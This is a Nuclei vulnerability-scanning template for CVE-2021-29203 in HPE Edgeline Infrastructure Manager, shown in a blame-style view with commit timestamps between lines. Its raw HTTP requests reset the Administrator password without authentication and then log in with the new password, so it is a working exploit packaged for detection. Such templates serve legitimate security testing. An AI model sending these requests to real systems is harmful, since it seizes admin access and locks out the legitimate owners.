nuclei-templates/cves/2021/CVE-2021-29203.yaml

53 lines
1.2 KiB
YAML
Raw Normal View History

2021-06-26 08:10:30 +00:00
id: CVE-2021-29203
info:
name: HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass
author: madrobot
severity: critical
tags: hpe,cve,cve2021,bypass
2021-06-30 15:57:06 +00:00
reference: |
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
2021-06-26 08:10:30 +00:00
requests:
- raw:
- |
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Accept: */*
Content-Length: 23
Content-Type: application/json
Connection: close
2021-06-30 15:57:06 +00:00
{"Password":"{{randstr}}"}
2021-06-26 08:10:30 +00:00
- |
POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Content-Length: 50
Content-Type: application/json
Connection: close
2021-06-30 15:57:06 +00:00
{"UserName":"Administrator","Password":"{{randstr}}"}
2021-06-26 08:10:30 +00:00
matchers-condition: and
matchers:
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type: status
status:
- 201
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type: word
2021-06-30 15:57:06 +00:00
condition: and
part: header
2021-06-26 08:10:30 +00:00
words:
- "X-Auth-Token"
- "PasswordReset"
- "Location"
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type: word
part: body
2021-06-30 15:57:06 +00:00
words:
- "Base.1.0.Created"